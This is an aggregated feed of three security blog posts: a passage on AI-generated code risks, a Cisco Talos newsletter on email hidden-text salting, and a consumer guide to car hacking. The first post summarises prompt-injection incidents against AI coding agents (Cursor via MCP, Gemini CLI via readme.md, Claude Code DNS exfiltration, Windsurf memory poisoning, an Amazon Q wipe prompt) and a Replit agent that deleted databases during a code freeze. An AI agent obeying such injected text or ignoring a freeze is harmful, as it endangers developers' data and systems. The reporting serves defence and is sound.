When AI-generated code is repeatedly revised through follow-up prompts, its security deteriorates. A recent study had GPT-4o modify previously written code up to 40 times, while researchers scanned each version for vulnerabilities after every round. After only five iterations, the code contained 37% more critical vulnerabilities than the initial version. The study tested four prompting strategies — three of which each having a different emphasis: (i) performance, (ii) security, and (iii) new functionality; the fourth was written with unclear unclear prompts.

When prompts focused on adding new features, 158 vulnerabilities appeared — including 29 critical ones. When the prompt emphasized secure coding, the number dropped significantly — but still included 38 new vulnerabilities, seven of them critical.

Interestingly, the “security-focused” prompts resulted in the highest percentage of errors in cryptography-related functions.

Ignoring industry context

In sectors such as finance, healthcare, and logistics there are technical, organizational, and legal requirements that must be considered during app development. AI assistants are unaware of these constraints. This issue is often called “missing depth”. As a result, storage and processing methods for personal, medical, and financial data mandated by local or industry regulations won’t be reflected in AI-generated code. For example, an assistant might write a mathematically correct function for calculating deposit interest, but ignore rounding rules enforced by regulators. Healthcare data regulations often require detailed logging of every access attempt — something AI won’t automatically implement at the proper level of detail.

Application misconfiguration

Vulnerabilities are not limited to the vibe code itself. Applications created through vibe coding are often built by inexperienced users, who either don’t configure the runtime environment at all, or configure it according to advice from the same AI. This leads to dangerous misconfigurations:

  • Databases required by the application are created with overly broad external access permissions. This results in leaks like Tea/Sapphos, where the attacker doesn’t even need to use the application to download or delete the entire database.
  • Internal corporate applications are left accessible to the public without authentication.
  • Applications are granted elevated permissions for access to critical databases. Combined with the vulnerabilities of AI-generated code, this simplifies SQL injections and similar attacks.

Platform vulnerabilities

Most vibe-coding platforms run applications generated from prompts directly on their own servers. This ties developers to the platform — including exposure to its vulnerabilities and dependence on its security practices. For example, in July a vulnerability was discovered in the Base44 platform that allowed unauthenticated attackers to access any private application.

Development-stage threats

The very presence of an assistant with broad access rights on the developer’s computer creates risks. Here are a few examples:

The CurXecute vulnerability (CVE-2025-54135) allowed attackers to order the popular AI development tool, Cursor, to execute arbitrary commands on the developer’s machine. All this needed was an active Model Context Protocol (MCP) server connected to Cursor, which an external party could use for access. This is a typical situation — MCP servers give AI agents access to Slack messages, Jira issues, and so on. Prompt injection can be performed through any of these channels.

The EscapeRoute vulnerability (CVE-2025-53109) allowed reading and writing of arbitrary files on the developer’s disk. The flaw existed in Anthropic’s popular MCP server, which lets AI agents write and read files in the system. The server’s access restrictions just didn’t work.

A malicious MCP server that let AI agents send and receive email via Postmark simultaneously forwarded all correspondence to a hidden address. We predicted the emergence of such malicious MCP servers back in September.

A vulnerability in the Gemini command-line interface allowed arbitrary command execution when a developer simply asked the AI assistant to analyze a new project’s code. The malicious injection was triggered from a readme.md file.

Amazon’s Q Developer extension for Visual Studio Code briefly contained instructions to wipe all data from a developer’s computer. An attacker exploited a mistake of Amazon’s developers, and managed to insert this malicious prompt into the assistant’s public code without special privileges. Fortunately, a small coding error prevented it from being executed.

A vulnerability in the Claude Code agent (CVE-2025-55284) allowed data to be exfiltrated from a developer’s computer through DNS requests. Prompt injection, which relied on common utilities that run automatically without confirmation, could be embedded in any code analyzed by the agent.

The autonomous AI agent Replit deleted the primary databases of a project it was developing because it decided the database required a cleanup. This violated a direct instruction prohibiting modifications (code freeze). Behind this unexpected AI behavior lays a key architectural flaw — at the time, Replit had no separation between test and production databases.

A prompt injection placed in a source code comment prompted the Windsurf development environment to automatically store malicious instructions in its long-term memory, allowing it to steal data from the system over months.

In the Nx compromise incident, command-line tools for Claude, Gemini, and Q were used to search for passwords and keys that could be stolen from an infected system.

How to use AI-generated code safely

The risk level from AI-generated code can be significantly, though not completely reduced through a mix of organizational and technical measures:

  • Implement automatic reviewing of AI-generated code as it’s written using optimized SAST tools.
  • Embed security requirements into the system prompts of all AI environments.
  • Have experienced human specialists perform detailed code reviews, supported by specialized AI-powered security analysis tools to increase effectiveness.
  • Train developers to write secure prompts and, more broadly, provide them with in-depth education on the secure use of AI.

Kaspersky official blog – ​Read More

Why don’t we sit around this computer console and have a sing-along?

Why don’t we sit around this computer console and have a sing-along?

Harnessing fire is one of mankind’s earliest technological advances. A controlled, tame fire offers us warmth, light and succulent cooked food. Yet, allow the controlled fire to burn too fiercely and it risks becoming an uncontained fire. The unexpected smell of smoke or the sight of tall flames provokes a deep fear within us and demands an instant response to contain and extinguish the fire, or to flee from its path.

We instinctively understand the benefits and dangers of fire. Through bitter experience we’ve learnt how to design and operate buildings to minimise the risks and maximise the survivability of fire. These lessons have become coded in rules and legislation which are often actively enforced and result in heavy sanctions for those who break them even before there is any evidence of a fire occurring.

In comparison, computer systems are a very recent technology. There are clear benefits to networked computer systems, we have come to rely on them to conduct many of the day-to-day tasks in our personal and professional lives. Yet, the dangers of computers are intangible. You can’t smell a software vulnerability or feel the burning heat of an active breach. Somehow their ethereal nature feels less pressing than the risk of fire and may to lead to complacency in addressing cyber threats.

The question of why we continue to experience cyber breaches despite having the technical know how to prevent them is one that fascinates me. I’m intrigued by the differences in decision making processes that leads to cyber risk either being prioritised or deprioritised within organisations. Indeed, so much so that this week I’m commencing a part-time doctorate to research this issue.

Frequently, cyber intelligence concentrates on the here and now, providing vital information to defend systems in the immediate term or near future. Threat intelligence must be timely. After all, it is better to have 80% of the intelligence in time than 100% too late. Yet, this rapid drum beat of needing to respond quickly can detract from the longer-term strategic intelligence issues of how the threat landscape is evolving and how we can improve our threat detection and response capabilities.

As a part-time student I have eight years to try and get a grip on how decisions in cyber security are made, and what makes a good decision. I’ll be certain to share my findings to help improve things, but don’t hold your breath, it will not be a fast process.

The one big thing

Cisco Talos has been closely monitoring the abuse of cascading style sheets (CSS) properties to include irrelevant content (or salt) in different parts of messages, a technique known as hidden text salting.

Why do I care?

There is widespread use of hidden text salting in malicious emails to bypass detection. Attackers embed hidden salt in the preheader, header, attachments and body — using characters, paragraphs and comments — by manipulating text, visibility and sizing properties. Talos has observed that hidden content is far more often found in spam and other email threats than in legitimate emails, posing a substantial challenge to both basic and advanced email defense solutions that leverage machine learning.

So now what? 

As explained with multiple examples, CSS provides a wide range of properties that can be abused by attackers to evade spam filters and detection engines. Therefore, two possible countermeasures are: first, to detect the presence of hidden text (or salt) in emails, and more importantly, to filter out the added salt before passing the message to downstream detection engines.

Top security headlines of the week

Physics Nobel Awarded to Three Scientists for Quantum Computing Breakthroughs
The 2025 Nobel Prize in Physics was awarded to three scientists for foundational work enabling quantum error correction — a cornerstone for stable, scalable quantum computers that could eventually undermine today’s encryption systems. (BBC)

Microsoft Defender Bug Triggers Erroneous BIOS Update Alerts
A bug in Microsoft Defender for Endpoint caused false vulnerability alerts related to Dell BIOS updates, leading to confusion among enterprise security teams. Microsoft confirmed the issue stems from a logic flaw in its vulnerability-fetching process. (Bleeping Computer)

Federal Government Acknowledges End of MS-ISAC Support
The U.S. federal government confirmed it will end funding for the Multi-State Information Sharing and Analysis Center (MS-ISAC), a program with a 20-year track record of helping state and local governments coordinate cybersecurity efforts. Advocates warn its loss will significantly weaken local cyber defense collaboration. (GovTech)

Can’t get enough Talos?

Footholds in Infrastructure: Defending Service Providers
Service providers sit at the heart of global connectivity… and the center of the threat landscape. In this short documentary, Cisco Talos explores the unique cybersecurity challenges faced by service providers.

Velociraptor leveraged in ransomware attacks
Cisco Talos has confirmed that ransomware operators are leveraging Velociraptor, an open-source digital forensics and incident response (DFIR) tool that had not previously been definitively tied to ransomware incidents.

What to do when you click on a suspicious link
As the go-to cybersecurity expert for your friends and family, you’ll want to be ready for those “I clicked a suspicious link — now what?” messages. Share this quick guide to help them know exactly what to do next.

Talos Takes: You can’t patch burnout 
October is Cybersecurity Awareness Month, but what happens when the defenders themselves are overwhelmed? In this powerful episode, Hazel and Joe Marshall get real about why protecting your well-being is just as vital as any technical defense.

Upcoming events where you can find Talos 

Most prevalent malware files from Talos telemetry over the past week 

SHA256: d933ec4aaf7cfe2f459d64ea4af346e69177e150df1cd23aad1904f5fd41f44a
MD5: 1f7e01a3355b52cbc92c908a61abf643
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=d933ec4aaf7cfe2f459d64ea4af346e69177e150df1cd23aad1904f5fd41f44a
Example Filename: cleanup.bat
Detection Name: W32.D933EC4AAF-90.SBX.TG

SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
MD5: 2915b3f8b703eb744fc54c81f4a9c67f
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
Example Filename: e74d9994a37b2b4c693a76a580c3e8fe_1_Exe.exe
Detection Name: Win.Worm.Coinminer::1201

SHA256: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974
MD5: aac3165ece2959f39ff98334618d10d9
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974
Example Filename: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974.exe
Detection Name: W32.Injector:Gen.21ie.1201

SHA256: c0ad494457dcd9e964378760fb6aca86a23622045bca851d8f3ab49ec33978fe
MD5: bf9672ec85283fdf002d83662f0b08b7
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=c0ad494457dcd9e964378760fb6aca86a23622045bca851d8f3ab49ec33978fe
Example Filename: f_00db3a.html
Detection Name: W32.C0AD494457-95.SBX.TG

SHA256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
MD5: 7bdbd180c081fa63ca94f9c22c457376
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
Example Filename: e74d9994a37b2b4c693a76a580c3e8fe_3_Exe.exe
Detection Name: Win.Dropper.Miner::95.sbx.tg

Cisco Talos Blog – ​Read More

How to protect your car from hacking | Kaspersky official blog

It’s been ten years since two researchers — Charlie Miller and Chris Valasek — terrified a Wired journalist (and then the whole world) with their remote hack of a Jeep Cherokee speeding down the highway. It played out like something straight out of a Stephen King novel — a possessed car gone rogue. The wipers started moving on their own, buttons stopped responding, the radio blasted uncontrollably, and the brake pedal went dead. We’ve covered that case in detail plenty before: here, here, and here.

Since then, cars have continued to evolve rapidly to integrate an ever-wider array of features. Digital electronics now control almost everything — from the engine and fuel systems to autopilot, passenger safety, and infotainment. That also means every interface or component can become a hacker’s entry point: MOST, LIN, and CAN buses, OBD ports, Ethernet, GPS, NFC, Wi-Fi, Bluetooth, LTE… But hey — on the bright side, the latest CarPlay lets you change your dashboard wallpaper!

Jokes aside, the most serious attacks no longer target individual vehicles, but rather their manufacturers’ servers. In 2024, for example, Toyota lost 240GB of data, including customer information and internal network details. A single compromised server can expose millions of vehicles at once.

Even the United Nations has taken note, and for once didn’t stop at “expressing concern”. Together with automakers, the UN has developed two key regulations — UN R155 and UN R156 — setting high-level cybersecurity and software update requirements for vehicle manufacturers. Also relevant is the ISO/SAE 21434:2021 standard, introduced in 2021, which details methods to mitigate cyber-risks throughout vehicle production. Though the above, technically, are recommendations, automakers have a strong incentive to comply: mass recalls can cost tens or even hundreds of millions of dollars. Case in point: following the incident mentioned earlier, Jeep had to recall 1.4 million vehicles in the U.S. alone — and faced a whopping $440 million in lawsuits.

Surprisingly, the UN’s efforts have had real impact. In the last two years, the strict new rules have already led to the discontinuation of several older models, simply because they were designed before the regulations came into force. The discontinued models in 2024 include the Porsche 718 Boxster and Cayman (July), Porsche Macan ICE (April), Audi R8 and TT (June), VW Up! and Transporter 6.1 (June), and Mercedes-Benz Smart EQ Fortwo (April).

What exactly can hackers do?

There are plenty of ways cybercriminals can cause trouble for drivers:

  • Creating dangerous situations. Disabling brakes, blasting loud music, or triggering other distractions (as in the Jeep case) can serve as psychological pressure or direct physical threats to anyone inside the vehicle.
  • Stealing telematics data. This can be used to launch a targeted attack on specific individuals. In 2024, millions of Kia vehicles were found vulnerable to remote tracking via a dealer portal. With just a license plate number, attackers could locate the car in real time, lock or unlock the doors, start or stop the engine, and even honk the horn. Similar issues have affected BMW, Mercedes, Ferrari, and other manufacturers. Researchers also discovered that by compromising smart alarm systems they could listen to what’s going on in the interior of the car, access vehicle history, and steal owners’ personal data.
  • Stealing the car itself. For example, by using devices such as CAN injectors, which connect to the vehicle’s CAN bus (through the headlight circuit, for example) and send commands that mimic signals from the real key.
  • Stealing payment data. You might wonder why a car would hold the owner’s credit card info? Well, one was needed to pay for BMW’s heated seat subscription, for example. But while that particular scheme was scrapped after a public backlash, the “everything-as-a-service” trend continues. For example, in 2023, Mercedes-Benz offered electric car drivers the option to pay extra for faster acceleration. The feature would shave 0.9 seconds off the 0–100km/h time for an annual fee of US$600–900!

How real is the threat to your car?

First, let’s determine which category your vehicle falls into. Kaspersky ICS-CERT experts roughly divide all cars into three groups:

Obsolete vehicles — no risk

Vehicles in this group have no interaction with external information systems via digital channels. Their control units are minimal, and the only interface (if any) is the diagnostic OBD port. They can’t be hacked remotely, and there are no known cases of cyberattacks against them — the only real threat is traditional theft. Even if you install a modern multimedia head unit or an emergency response system, those modules remain isolated from the car’s internal components, preventing any attack on critical systems.

Legacy vehicles — highest risk

These models come in-between older cars with nothing to hack (“when cars were car”, etc.), and today’s “computers on wheels” packed with sensors and interfaces. Most of their systems and controls are digital. They typically include a telematics unit for wireless connectivity, a powerful infotainment system, and intelligent driver-assistance features.

Together, these modules form a poorly protected information network where the ability to remotely adjust vehicle settings or control certain systems creates plenty of potential attack vectors. Owners often replace the outdated factory head units with new ones from third-party manufacturers — which rarely prioritize cybersecurity.

Such models are the most vulnerable to serious cyberattacks — including those that can endanger the driver’s or passengers’ lives. But no one is planning serious security updates for them anymore. That ill-fated Jeep mentioned earlier falls squarely into this category.

Modern vehicles — medium risk

The latest models take into account lessons learned from past mistakes, as well as newly developed standards and regulations. Manufacturers now use segmented network architectures with a central gateway that filters traffic to isolate critical systems from the components most exposed to attack — the infotainment and telecom modules.

Major automakers (General Motors was among the first, plus Tesla, Ford, Hyundai, BMW, Mercedes, Volkswagen, Toyota, Honda, and component makers like Bosch and Continental) now have dedicated cybersecurity teams and conduct penetration testing.

However, this doesn’t mean these cars are completely secure. Researchers regularly find new vulnerabilities even in the most advanced models, because their attack surface is far larger than that of older vehicles.

By the way, Kaspersky has developed its own car cybersecurity solution — Kaspersky Automotive Secure Gateway, so our top-tier protection will soon be available for vehicles too.

What to look out for when buying a car?

When buying a new vehicle these days, consider not only the technical specs but also its cybersecurity. Start by checking online for reports of cyberattacks on specific models or their manufacturers — such incidents rarely go unnoticed.

If possible, find information about the following:

  • The information network architecture of the car
  • The presence of a central security gateway
  • Separation of the car’s network into security domains
  • Support of CAN-message encryption

You should also ask the dealer the right questions:

  • What cybersecurity systems are built into the car?
  • How often are software updates released for this model, and how are they installed?
  • How can unused smart functions be disabled?

How do you set everything up correctly if you already have a car?

Start with the manufacturer’s mobile app (if one exists).

  • Set a strong, unique password that doesn’t contain any personal information. For help with this, see Creating an unforgettable password.
  • Strengthen your account security with two-factor authentication or passkeys, if available.
  • Regularly check the activity log and the list of devices connected to your account.
  • Disable any unused features in both the app and the car.

Next, tighten up the privacy settings in the car itself.

  • Turn off telemetry collection where possible.
  • Limit access to microphones and cameras.
  • Clear your travel history and saved contacts before selling the car.

And let’s not forget about managing connected devices.

  • Regularly review paired Bluetooth devices.
  • If possible, prohibit Bluetooth pairing without confirmation.
  • Remove connections to the devices of previous owners or passengers.
  • Disable automatic connection to unknown Wi-Fi networks.

A few final tips:

What to do if you suspect your car is hacked?

First, ask yourself: “What’s the evidence?” and check for the following signs of compromise:

  • Vehicle features unexpectedly turning on and off
  • Rapid battery drain with no obvious cause
  • Strange notifications in the vehicle’s mobile app
  • Inability to control the car normally

If you suspect a hack, do the following:

  • Disconnect the car from the internet. Remove the SIM card if possible, or contact your mobile operator to block data transfer for the number linked to the vehicle.
  • Change passwords for the car’s mobile app. If possible, terminate all sessions tied to your account (often an option in the settings), or review all connections and remove any unknown devices.
  • Take photos of any alerts the car displays.
  • If you’ve entered payment card details in the car, block the card immediately.
  • Contact an authorized dealer for diagnostics.
  • Contact the vehicle manufacturer’s support.
  • If you suspect data theft, report it to the police.

Note that for private owners, the most likely threats are tracking and theft. However, for organizations that operate fleets (taxis, car-sharing, transportation or construction equipment companies), the risks are significantly higher. For a deeper dive into current automotive cybersecurity trends, check out our report on the Kaspersky ICS CERT site.

Want to learn more about other threats to car owners? Browse our relevant posts:

Kaspersky official blog – ​Read More